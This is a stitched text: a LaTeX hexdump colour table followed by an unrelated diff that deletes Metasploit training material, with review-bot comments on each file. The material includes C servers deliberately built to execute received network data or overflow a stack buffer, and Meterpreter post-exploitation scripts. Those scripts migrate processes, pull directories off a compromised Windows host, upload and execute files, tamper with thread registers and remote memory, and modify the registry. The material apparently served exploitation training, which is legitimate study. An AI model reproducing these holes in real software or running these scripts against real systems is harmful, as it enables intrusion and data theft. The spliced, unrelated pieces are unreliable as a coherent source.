\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy16}{rgb}{0.062,0,0.937}
\definecolor{Hexy16}{rgb}{0.062,0,0.937}
\definecolor{Hexy0}{rgb}{0,0,0}
\definecolor{HexyGreen}{rgb}{0,.7,0}
{\footnotesize
\begin{semiverbatim}
total: 6000
uniq: 141
\color{HexyGreen}\color{HexyGreen} 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f
\color{HexyGreen}00 \color{Hexy0}00 \color{Hexy18}12 \color{Hexy17}11 11 \color{Hexy57}39 \color{Hexy58}3a \color{Hexy0}00 00 \color{Hexy17}11 \color{Hexy18}12 12 12 \color{Hexy57}39 39 \color{Hexy0}00 00
\color{HexyGreen}10 \color{Hexy17}11 11 11 11 \color{Hexy57}39 39 \color{Hexy0}00 00 \color{Hexy17}11 \color{Hexy18}12 \color{Hexy17}11 11 \color{Hexy57}39 39 \color{Hexy0}00 00
\color{HexyGreen}20 \color{Hexy18}12 12 12 12 \color{Hexy57}39 \color{Hexy58}3a \color{Hexy0}00 \color{Hexy58}3a \color{Hexy18}12 \color{Hexy17}11 \color{Hexy18}12 12 \color{Hexy57}39 39 \color{Hexy0}00 \color{Hexy57}39
\color{HexyGreen}30 \color{Hexy17}11 \color{Hexy18}12 12 \color{Hexy17}11 \color{Hexy57}39 \color{Hexy58}3a \color{Hexy0}00 \color{Hexy58}3a \color{Hexy18}12 12 12 12 \color{Hexy57}39 39 \color{Hexy0}00 \color{Hexy57}39
\color{HexyGreen}40 \color{Hexy57}39 \color{Hexy58}3a 3a \color{Hexy57}39 \color{Hexy0}00 00 \color{Hexy57}39 39 39 39 39 \color{Hexy58}3a \color{Hexy0}00 00 \color{Hexy57}39 39
\color{HexyGreen}50 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}60 \color{Hexy0}00 00 00 00 00 00 \color{Hexy57}39 39 \color{Hexy0}00 \color{Hexy18}12 \color{Hexy0}00 \color{Hexy17}11 \color{Hexy0}00 00 00 00
\color{HexyGreen}70 \color{Hexy57}39 39 39 39 \color{Hexy58}3a \color{Hexy57}39 39 39 39 39 39 39 39 \color{Hexy58}3a \color{Hexy57}39 39
\color{HexyGreen}80 \color{Hexy17}11 \color{Hexy18}12 \color{Hexy0}00 \color{Hexy18}12 \color{Hexy17}11 \color{Hexy18}12 \color{Hexy17}11 \color{Hexy18}12 12 12 \color{Hexy0}00 00 00 00 00 00
\color{HexyGreen}90 \color{Hexy57}39 39 39 \color{Hexy58}3a \color{Hexy0}00 00 \color{Hexy57}39 \color{Hexy58}3a 3a 3a \color{Hexy0}00 \color{Hexy57}39 \color{Hexy0}00 00 00 \color{Hexy57}39
\color{HexyGreen}a0 \color{Hexy0}00 00 00 00 00 00 00 00 \color{Hexy57}39 39 \color{Hexy0}00 00 00 00 00 00
\color{HexyGreen}b0 \color{Hexy57}39 39 39 39 39 39 39 39 39 \color{Hexy58}3a \color{Hexy57}39 39 \color{Hexy0}00 00 \color{Hexy57}39 39
\color{HexyGreen}c0 \color{Hexy17}11 11 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}d0 \color{Hexy18}12 12 \color{Hexy17}11 11 \color{Hexy57}39 39 \color{Hexy58}3a \color{Hexy0}00 00 00 00 00 00 00 00 00
\color{HexyGreen}e0 \color{Hexy58}3a \color{Hexy57}39 39 39 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy57}39 \color{Hexy0}00 00 00 00
\color{HexyGreen}f0 \color{Hexy0}00 00 00 00 00 \color{Hexy57}39 \color{Hexy17}11 \color{Hexy18}12 \color{Hexy57}39 39 \color{Hexy0}00 00 \color{Hexy57}39 39 \color{Hexy16}10 10
\end{semiverbatim}
}

View File

@ -1,19 +0,0 @@
module Msf
class Auxiliary::BhAux < Msf::Auxiliary
def initialize
super(
'Name' => "BlackHat Training Auxiliary Module",
'Description' => "Example Auxiliary Module",
'Author' => "skape",
'License' => MSF_LICENSE)
end
def run
print_status("Inside run...")
end
end
end
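Review bot: Deleting this stub is safe; `BhAux#run` only calls `print_status("Inside run...")` and the class registers no options or targets, so nothing else in the tree can depend on it. One style point for anyone reusing it as a template: `class Auxiliary::BhAux < Msf::Auxiliary` inside `module Msf` only resolves if `Msf::Auxiliary` has already been loaded by the time this file is required; the nested `module Msf / module ... / class ...` form used by the encoder example later in this diff does not have that ordering dependency.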

View File

@ -1,22 +0,0 @@
module Msf
module Encoders
class BlackHatEncoder < Msf::Encoder
def initialize
super(
'Name' => 'BlackHat Example Encoder',
'Version' => '$Revision: 3154 $',
'Description' => %q{
Sample encoder that just returns the block it's passed
when encoding occurs.
},
'Author' => 'skape',
'Arch' => ARCH_ALL)
end
def encode_block(state, buf)
buf
end
end ;end ;end
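Review bot: Style point on the last line: `end ;end ;end` closes the class and both enclosing modules on a single line, which hides the nesting; one `end` per line at the matching indentation is the convention elsewhere in the tree. Also, `'Version' => '$Revision: 3154 $'` only carries a real number while the file has the `svn:keywords` property set; without it the literal placeholder string is what gets reported, so it is not a reliable version field on its own.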

View File

@ -1,12 +0,0 @@
module Msf
class Plugin::Bob < Msf::Plugin
module BobExtension
def bob
"bob"
end
end
def initialize(framework, options)
framework.extend(BobExtension)
end
end
end
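Review bot: `initialize(framework, options)` never calls `super`, so whatever setup the `Msf::Plugin` base constructor performs with `framework` and `options` is skipped; `super` should be the first statement. Separately, `framework.extend(BobExtension)` has no inverse: `Object#extend` cannot be undone, so the `bob` method stays on the framework instance for the life of the process even after the plugin is unloaded, which is worth a comment if this pattern is kept as a teaching example.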

View File

@ -1,116 +0,0 @@
/*
* srv.c -- Example server for easy exploiting
*
* Usage: srv <port>
*
* Example:
*
* C:\> srv 1234
* C:\> nload localhost 1234 -s code.s
*
*/
#include <stdio.h>
#include <string.h>
#include <errno.h>
#if defined _WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#else
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <unistd.h>
#endif
#define SERVER_PORT 5433
#define MAX_PENDING 1
int ehlo, from;
/* Main function */
int main(int argc, char **argv) {
struct sockaddr_in sin;
char buf[8092], *ptr;
int c, i, len, port;
int s, new_s, bytes;
#if defined _WIN32
int wsaret;
WSADATA wsaData;
#endif
int (*funct)();
/* Command line parameters */
if (argv[1])
port = atoi(argv[1]);
else
port = SERVER_PORT;
#if defined _WIN32
/* Initialize winsock */
wsaret = WSAStartup(0x101, &wsaData);
if(wsaret != 0)
return (0);
/* Create a socket */
if ((s = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0)) < 0) {
fprintf(stderr, "%s: WSASocket - %s\n", argv[0], strerror(errno));
exit(1);
}
#else
if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
fprintf(stderr, "%s: socket - %s\n", argv[0], strerror(errno));
exit(1);
}
#endif
/* Initialize the addres data structure */
memset((void *)&sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = INADDR_ANY;
sin.sin_port = htons(port);
/* Bind an address to the socket */
if (bind(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
fprintf(stderr, "%s: bind - %s\n", argv[0], strerror(errno));
exit(1);
}
/* Set the length of the listen queue */
if (listen(s, MAX_PENDING) < 0) {
fprintf(stderr, "%s: listen - %s\n", argv[0], strerror(errno));
exit(1);
}
len = sizeof(sin);
new_s = accept(s, (struct sockaddr *)&sin, &len);
memset(buf, 0, sizeof(buf));
bytes = recv(new_s, buf, sizeof(buf), 0);
printf("recv'd %d\n", bytes);
/* Run the code */
fprintf(stderr,"Oops.. I'm 0wned.\n");
__asm mov edi, new_s
funct = (int (*)()) buf;
(int)(*funct)();
return (0);
}
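Review bot: The POSIX branch of this file cannot build: `__asm mov edi, new_s` is MSVC-only syntax and sits outside the `#if defined _WIN32` guard, `atoi` and `exit` are used without `<stdlib.h>`, and `len` is passed to `accept` as an `int` where POSIX expects `socklen_t`. Jumping into the received buffer (`funct = (int (*)()) buf; (int)(*funct)();`) is the stated purpose of this training target ("Example server for easy exploiting"), so that part is intended, but two things would still deserve a fix if the file were kept: `recv` can return -1 and the code jumps into `buf` regardless of `bytes`, and binding to `INADDR_ANY` exposes the intentionally exploitable listener on every interface when `INADDR_LOOPBACK` would do for a classroom setup. The globals `ehlo`/`from` and the locals `ptr`, `c`, `i` are unused.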

View File

@ -1,123 +0,0 @@
#include <stdio.h>
#include <string.h>
#include <errno.h>
#if defined _WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#else
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <unistd.h>
#endif
#define SERVER_PORT 5432
#define MAX_PENDING 1
int ehlo, from;
/* Main function */
void Runner(int new_s);
int main(int argc, char **argv) {
struct sockaddr_in sin;
char buf[8092], *ptr;
int c, i, len, port;
int s, new_s, bytes;
#if defined _WIN32
int wsaret;
WSADATA wsaData;
#endif
int (*funct)();
/* Command line parameters */
if (argv[1])
port = atoi(argv[1]);
else
port = SERVER_PORT;
#if defined _WIN32
/* Initialize winsock */
wsaret = WSAStartup(0x101, &wsaData);
if(wsaret != 0)
return (0);
/* Create a socket */
if ((s = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0)) < 0) {
fprintf(stderr, "%s: WSASocket - %s\n", argv[0], strerror(errno));
exit(1);
}
#else
if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
fprintf(stderr, "%s: socket - %s\n", argv[0], strerror(errno));
exit(1);
}
#endif
/* Initialize the addres data structure */
memset((void *)&sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = INADDR_ANY;
sin.sin_port = htons(port);
/* Bind an address to the socket */
if (bind(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
fprintf(stderr, "%s: bind - %s\n", argv[0], strerror(errno));
exit(1);
}
/* Set the length of the listen queue */
if (listen(s, MAX_PENDING) < 0) {
fprintf(stderr, "%s: listen - %s\n", argv[0], strerror(errno));
exit(1);
}
while (1)
{
__try
{
len = sizeof(sin);
new_s = accept(s, (struct sockaddr *)&sin, &len);
CloseHandle(CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Runner, (void *)new_s, 0, NULL));
} __except(EXCEPTION_EXECUTE_HANDLER)
{
fprintf(stderr, "Got exception: %lu\n", GetExceptionCode());
}
}
return (0);
}
void Runner(int new_s)
{
char buf[8092];
int len;
int bytes;
int (*funct)();
__try
{
memset(buf, 0, sizeof(buf));
bytes = recv(new_s, buf, sizeof(buf), 0);
printf("recv'd %d\n", bytes);
__asm mov edi, new_s
funct = (int (*)()) buf;
(int)(*funct)();
} __except(EXCEPTION_EXECUTE_HANDLER)
{
fprintf(stderr, "Got exception: %lu\n", GetExceptionCode());
}
}
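Review bot: The thread entry point is mis-typed: `Runner` is declared `void Runner(int new_s)` but handed to `CreateThread` through an `(LPTHREAD_START_ROUTINE)` cast, whereas a thread routine must be `DWORD WINAPI (*)(LPVOID)`; on 32-bit x86 the cdecl/stdcall mismatch leaves the stack unbalanced on return and the thread exit code is garbage. Declare `DWORD WINAPI Runner(LPVOID arg)` and cast the socket out of `arg` inside. Every `__try`/`__except`, `CreateThread`, `CloseHandle` and `__asm` use is outside the `_WIN32` guard, so the `#else` POSIX includes are dead code, and the accepted socket `new_s` is never closed, so the listener leaks one descriptor per connection.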

View File

@ -1,119 +0,0 @@
#include <stdio.h>
#include <string.h>
#include <errno.h>
//#include <windows.h>
#if defined _WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#else
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <unistd.h>
#endif
#define SERVER_PORT 5432
#define MAX_PENDING 1
int ehlo, from;
/* Main function */
void Runner(int new_s);
int main(int argc, char **argv) {
struct sockaddr_in sin;
char buf[8092], *ptr;
int c, i, len, port;
int s, new_s, bytes;
#if defined _WIN32
int wsaret;
WSADATA wsaData;
#endif
int (*funct)();
/* Command line parameters */
if (argv[1])
port = atoi(argv[1]);
else
port = SERVER_PORT;
#if defined _WIN32
/* Initialize winsock */
wsaret = WSAStartup(0x101, &wsaData);
if(wsaret != 0)
return (0);
/* Create a socket */
if ((s = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0)) < 0) {
fprintf(stderr, "%s: WSASocket - %s\n", argv[0], strerror(errno));
exit(1);
}
#else
if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
fprintf(stderr, "%s: socket - %s\n", argv[0], strerror(errno));
exit(1);
}
#endif
/* Initialize the addres data structure */
memset((void *)&sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = INADDR_ANY;
sin.sin_port = htons(port);
/* Bind an address to the socket */
if (bind(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
fprintf(stderr, "%s: bind - %s\n", argv[0], strerror(errno));
exit(1);
}
/* Set the length of the listen queue */
if (listen(s, MAX_PENDING) < 0) {
fprintf(stderr, "%s: listen - %s\n", argv[0], strerror(errno));
exit(1);
}
while (1)
{
__try
{
len = sizeof(sin);
new_s = accept(s, (struct sockaddr *)&sin, &len);
CloseHandle(CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Runner, (void *)new_s, 0, NULL));
} __except(EXCEPTION_EXECUTE_HANDLER)
{
fprintf(stderr, "Got exception: %lu\n", GetExceptionCode());
}
}
return (0);
}
void RunnerStuff(int sock)
{
char buf[64];
int bytes;
bytes = recv(sock, buf, 3048, 0);
printf("recv'd %d\n", bytes);
}
void Runner(int new_s)
{
char buf[4096];
RunnerStuff(new_s);
fprintf(stderr, "done");
}
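Review bot: `RunnerStuff` declares `char buf[64]` and then calls `recv(sock, buf, 3048, 0)`, so a peer can overrun the stack frame; this is clearly the intended bug for this variant of the training server, but nothing in the file says so, and a one-line comment marking the overflow as deliberate would keep a well-meaning reader from "fixing" it. The `(LPTHREAD_START_ROUTINE)Runner` signature mismatch noted on the previous file applies here too, `char buf[4096]` in `Runner` is unused, and `//#include <windows.h>` is commented out even though `__try`, `CreateThread` and `CloseHandle` depend on it (it presumably compiles only because `winsock2.h` pulls `windows.h` in).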

View File

@ -1,18 +0,0 @@
#!/bin/sh
export DEV=/projects/metasploit/framework3/trunk/
export SBL=/projects/metasploit/framework3/tags/framework-3.0/
export FIL=$1
echo "[*] Gathering svn information..."
TMP=`tempfile mergeXXXXXXX`
svn log --limit 1 "${DEV}${FIL}" | egrep -v '^r[0-9]+|^--|^$' > $TMP
echo "[*] Copying file ${FIL}..."
cp ${DEV}${FIL} ${SBL}${FIL}
echo "[*] Merging file ${FIL}..."
svn add ${SBL}${FIL} >/dev/null 2>&1
svn commit --non-interactive -F $TMP ${SBL}${FIL}
rm -f $TMP
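Review bot: `$1` is used unchecked: with no argument, `${DEV}${FIL}` expands to the trunk root, so `svn log --limit 1` runs on the whole tree and `cp` of a directory fails in a confusing way; add `[ -n "$1" ] || { echo "usage: $0 <path>"; exit 1; }` before anything else. Every expansion (`${DEV}${FIL}`, `$TMP`, `${SBL}${FIL}`) is unquoted, so any path containing whitespace breaks, and `tempfile` is a Debian-specific utility where `mktemp` is the portable choice. `DEV` and `SBL` are hard-coded to one developer's checkout paths.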

View File

@ -1,19 +0,0 @@
#!/usr/bin/env ruby -I../../lib
require 'Rex/Post'
class DemoClient
def initialize(host, port)
self.sock = TCPSocket.new(host, port)
self.client = Rex::Post::Meterpreter::Client.new(sock)
self.client.core.use('Stdapi')
end
attr_reader :client
protected
attr_accessor :sock
attr_writer :client
end
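Review bot: `TCPSocket.new` is used without `require 'socket'`; it works only if `Rex/Post` loads it transitively, so the require should be explicit. The capitalised `require 'Rex/Post'` also predates the lowercase layout: the irb helper script later in this diff uses `require 'rex/post/meterpreter'`, and mixing the two spellings on a case-sensitive filesystem means one of them fails to resolve.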

View File

@ -1,5 +0,0 @@
<html>
<center>
<h1>Metasploit Post-Exploitation Demo</h1>
</center>
</html>

View File

@ -1,19 +0,0 @@
#!/usr/bin/env ruby -I. -I../../lib
require 'DemoClient'
host = ARGV[0] || '127.0.0.1'
port = ARGV[1] || '12345'
client = DemoClient.new(host, port).client
pid = client.sys.process['calc.exe']
puts "before migrate: my pid is #{client.sys.process.getpid}"
client.core.migrate(pid)
puts "after migrate: my pid is #{client.sys.process.getpid}"
while (1)
select nil, nil, nil, 5
end
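Review bot: `client.sys.process['calc.exe']` yields `nil` when no such process exists, and the script passes that straight into `client.core.migrate(pid)`; guard it with `abort "calc.exe not found" unless pid` before the "before migrate" line so the failure is reported by the script rather than by the remote side.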

View File

@ -1,16 +0,0 @@
#!/usr/bin/env ruby -I. -I../../lib
require 'DemoClient'
host = ARGV[0] || '127.0.0.1'
port = ARGV[1] || '12345'
src_dir = ARGV[2] || "%WINDIR%\\inf"
dst_dir = ARGV[3] || "/tmp/mirror_demo"
client = DemoClient.new(host, port).client
begin
Dir.mkdir(dst_dir)
rescue
end
client.fs.dir.download(dst_dir, src_dir, true)
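Review bot: The bare `rescue` around `Dir.mkdir(dst_dir)` swallows every `StandardError`, including `Errno::EACCES` and `Errno::ENOENT`, so a failed local directory creation is silent and `client.fs.dir.download` fails one step later with a less obvious error; narrow it to `rescue Errno::EEXIST`, or use `FileUtils.mkdir_p(dst_dir)` and drop the rescue. The same bare rescue is repeated around `client.fs.dir.mkdir` in the upload script that follows.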

View File

@ -1,16 +0,0 @@
#!/usr/bin/env ruby -I. -I../../lib
require 'DemoClient'
host = ARGV[0] || '127.0.0.1'
port = ARGV[1] || '12345'
src_dir = ARGV[2] || "/tmp/mirror_src_demo"
dst_dir = ARGV[3] || "c:\\personal\\temp\\dst_mirror"
client = DemoClient.new(host, port).client
begin
client.fs.dir.mkdir(dst_dir)
rescue
end
client.fs.dir.upload(dst_dir, src_dir, true)

View File

@ -1,13 +0,0 @@
#!/usr/bin/env ruby -I. -I../../lib
require 'DemoClient'
HTML_FILE = "demo1.html"
host = ARGV[0] || '127.0.0.1'
port = ARGV[1] || '12345'
client = DemoClient.new(host, port).client
client.fs.file.upload('%TEMP%', HTML_FILE)
client.sys.process.execute('cmd /C "explorer %TEMP%\demo1.html"')

View File

@ -1,39 +0,0 @@
#!/usr/bin/env ruby -I. -I../../lib
require 'DemoClient'
require 'Rex/Socket/Parameters'
host = ARGV[0] || '127.0.0.1'
port = ARGV[1] || '12345'
client = DemoClient.new(host, port).client
# Create a parameter representation class based on the perl-style hash
# elements
params = Rex::Socket::Parameters.new(
'PeerHost' => '128.242.160.3',
'PeerPort' => 25,
'Proto' => 'tcp')
# Create the socket for this connection
socket = client.net.socket.create(params)
# Send GET / HTTP/1.0
socket.send("HELO hick.org\r\n")
data = socket.recv
puts "#{data}"
socket.send("QUIT\r\n")
socket.sock.shutdown(1)
while ((data = socket.recv) != nil)
puts "#{data}"
end
puts "Finished"
#while (1)
# select nil, nil, nil, 5
#end
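Review bot: The comment `# Send GET / HTTP/1.0` is stale: the script speaks SMTP (`HELO hick.org`, then `QUIT`, to port 25), so the comment should say so. `socket.recv` is called with no length or timeout and will block for as long as the peer stays silent, and the drain loop `while ((data = socket.recv) != nil)` after `shutdown(1)` assumes `recv` signals EOF with `nil` rather than an empty string; checking for both is safer. The peer `128.242.160.3` is hard-coded, which limits this to one developer's test setup.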

View File

@ -1,361 +0,0 @@
#!/usr/bin/env ruby -I../../lib
require 'Rex/Post'
netconf = false
ui = false
net = false
fseek = false
dir = false
process = true
registry = false
copy = false
sock = TCPSocket.new('127.0.0.1', 12345)
client = Rex::Post::Meterpreter::Client.new(sock)
client.core.use(
'Stdapi')
puts "Client interface:"
client.dump_extension_tree.each { |x|
puts "\t#{x}"
}
puts "\n\n"
if (net)
s = client.net.create_channel(
'PeerHost' => '128.242.160.3',
'PeerPort' => '80',
'Proto' => 'tcp')
puts "writing 'GET / HTTP/1.0'..."
s.write("GET / HTTP/1.0\r\n\r\n")
puts "reading in 20 bytes from the socket:\n#{s.read(20)}"
s.close
end
if (copy)
puts "Uploading...\n"
client.fs.file.upload("c:\\personal\\temp\\mirror", "/bin/cat", "/tmp/dog")
puts "Downloading...\n"
client.fs.file.download("/tmp/test", "c:\\personal\\temp\\ati3duag.dll",
"c:\\personal\\temp\\blah.asm", "c:\\personal\\temp\\boa.tar.gz")
end
if (netconf)
puts "Routes:\n\n"
client.net.config.each_route { |route|
puts route.pretty
}
puts "\n\nInterfaces:\n\n"
client.net.config.each_interface { |interface|
puts interface.pretty
}
client.net.config.add_route('1.2.3.4', '255.255.255.255', '127.0.0.1')
puts "after adding 1.2.3.4 route\n\n"
client.net.config.each_route { |route|
puts route.pretty
}
client.net.config.remove_route('1.2.3.4', '255.255.255.255', '127.0.0.1')
puts "after removing 1.2.3.4 route\n\n"
client.net.config.each_route { |route|
puts route.pretty
}
end
if (ui)
input = false
puts "idle time: #{client.ui.idle_time}"
sleep 60
puts "idle time: #{client.ui.idle_time}"
if (input)
puts "disabling"
# client.ui.disable_keyboard
client.ui.disable_mouse
sleep 60
puts "enabling"
# client.ui.enable_keyboard
client.ui.enable_mouse
puts "done"
end
end
if (fseek)
f = client.fs.file.new("c:\\personal\\temp\\hm.c")
puts "current position: #{f.tell}"
puts "some text:\n#{f.read}"
puts "current position: #{f.tell}"
f.seek(0, IO::SEEK_SET)
puts "current position: #{f.tell}"
puts "some text again:\n#{f.read}"
f.seek(40, IO::SEEK_SET)
puts "eof? #{f.eof}"
puts "current position: #{f.tell}"
puts "some text again:\n#{f.read}"
begin
puts "some text again:\n#{f.read}"
puts "some text again:\n#{f.read}"
rescue EOFError
puts "got eof"
rescue
puts "got other"
end
puts "eof? #{f.eof}"
end
if (dir)
puts "Testing dir...\n\n"
puts "%WINDIR% is #{client.fs.file.expand_path('%WINDIR%')}"
puts "Getting contents of C:\\"
client.fs.dir.foreach("C:\\") { |name|
puts "\t#{name}\n"
}
puts "working directory: #{client.fs.dir.pwd}"
client.fs.dir.chdir("..")
puts "working directory: #{client.fs.dir.getwd}"
client.fs.dir.chdir("c:\\windows")
puts "working directory: #{client.fs.dir.pwd}"
client.fs.dir.mkdir("c:\\personal\\temp\\tester")
client.fs.dir.unlink("c:\\personal\\temp\\tester")
s = client.fs.filestat.new("C:\\Windows\\notepad.exe")
puts s.pretty
puts client.fs.file.stat("C:\\windows\\notepad.exe").mtime
# open a file and read in some text
f = client.fs.file.new("C:\\personal\\temp\\hm.c")
puts "some text:\n #{f.read}"
f.close
end
if (process)
puts "Testing process...\n\n"
puts "exploited pid is #{client.sys.process.getpid}"
puts "exploited name is #{client.sys.process.open.name}"
puts "exploited path is #{client.sys.process.open.path}"
##
#
# enumeration testing
#
##
debug_pid = client.sys.process['calc.exe']
puts "pid of calc.exe is #{debug_pid}"
#client.sys.process.kill(debug_pid)
##
#
# Load a library in another process
#
##
p = client.sys.process.open(debug_pid)
base = p.image.load('zipfldr.dll')
printf "loaded zipfldr.dll into #{p.pid} at %.8x\n", base
addr = p.image.get_procedure_address('zipfldr.dll', 'RouteTheCall')
printf "addr of RouteTheCall is: %.8x\n", addr
p.image.unload(base)
puts "unloaded it"
##
#
# Execution
#
##
p = client.sys.process.execute("cmd.exe", nil,
{
'Channelized' => true
})
d = p.io.read
puts "read from cmd.exe:\n#{d}"
p.io.write("dir\n")
d = p.io.read
puts "read from cmd.exe:\n#{d}"
##
#
# threads
#
##
p = client.sys.process.open(debug_pid)
p.thread.each_thread { |id|
puts "thread id: #{id}"
thread = p.thread.open(id)
puts "suspending..."
thread.suspend
puts "registers:\n"
puts thread.pretty_regs
thread.set_regs(
'eax' => 0x41414141,
'ebx' => 0xdeadbeef)
puts thread.pretty_regs
puts "resuming..."
thread.resume
puts "closing..."
thread.close
}
##
#
# code injection
#
##
#buf = p.memory.allocate(400)
#p.memory.write(buf, "\xcc")
#p.thread.create(buf)
#p.close
##
#
# image testing
#
##
exp = client.sys.process.open
addr = exp.image.load('wininet.dll')
printf "wininet.dll is loaded at: %.8x\n", addr
exp.image.unload(addr)
printf "LoadLibraryA is at: %.8x\n", exp.image.get_procedure_address('kernel32.dll', 'LoadLibraryA')
printf "ntdll.dll base is at: %.8x\n", exp.image['ntdll.dll']
##
#
# memory testing
#
##
p = client.sys.process.open(debug_pid, PROCESS_ALL)
addr = p.memory.allocate(400, PROT_WRITE | PROT_READ)
printf "allocated memory at %.8x\n", addr
p.memory.write(addr, 'this is a test yo')
data = p.memory.read(addr, 10)
printf "read memory from %.8x (#{data.length}): #{data.to_s}\n", addr
info = p.memory.query(addr)
printf "addr: %.8x (size=%d, prot=%.8x)\n", addr, info['RegionSize'], info['Protect']
if (p.memory.writable?(addr))
puts "memory is writable like it should be\n"
end
p.memory.protect(addr, info['RegionSize'], PROT_READ)
if (!p.memory.writable?(addr))
puts "memory is NOT writable like it should be\n"
else
puts "memory is writable but it should not be\n"
end
begin
p.memory.write(addr, 'test again')
rescue
puts "caught exception like expected during write #{$!}"
end
p.close
# attach to the exploited process
exp = client.sys.process.open
addr = exp.memory.allocate(400, PROT_WRITE)
exp.memory.lock(addr, 4096)
exp.memory.unlock(addr, 4096)
exp.close
end
if (registry)
puts "Testing registry...\n\n"
regkey = client.sys.registry.open_key(HKEY_CURRENT_USER,
'Software', KEY_ALL_ACCESS)
puts "hkey is #{regkey.hkey}"
regkey.set_value('test123', REG_SZ, 'yo what up')
regkey.set_value('testdword', REG_DWORD, '666')
val = regkey.query_value('test123')
val2 = regkey.query_value('testdword')
puts "value name: #{val.name} type: #{val.type} data: '#{val.data}'"
puts "value name: #{val2.name} type: #{val2.type} data: '#{val2.data}'"
val.set('ho ho ho')
val.delete
regkey.enum_key.each { |key|
puts "child key: #{key}"
}
regkey.enum_value.each { |value|
puts "child value: #{value.name}"
}
k = regkey.create_key('TestKey')
k.close
regkey.delete_key('TestKey')
regkey.close
end
while (true)
printf("sup\n")
select nil, nil, nil, 4
end
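Review bot: The thread section is destructive for something meant as a test: for every thread in `debug_pid` it calls `thread.suspend`, overwrites `eax`/`ebx` with `0x41414141`/`0xdeadbeef` through `set_regs`, and then `thread.resume`, leaving `calc.exe` in a corrupted state; saving `thread.pretty_regs`'s underlying values and restoring them before resuming would make the run repeatable. Elsewhere, `regkey.set_value('testdword', REG_DWORD, '666')` passes the DWORD as a string, the `if (copy)` block references fixed developer paths (`c:\\personal\\temp\\...`, `/bin/cat`), and the peer `128.242.160.3` is hard-coded, which is presumably why every section except `process` is switched off by the boolean flags at the top.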

View File

@ -1,22 +0,0 @@
#!/usr/bin/env ruby
$: << 'lib' << '../lib' << '../../lib'
require 'socket'
require 'rex'
require 'rex/post/meterpreter'
if(ARGV.length != 2)
puts "usage: <ip> <port>"
exit(1)
end
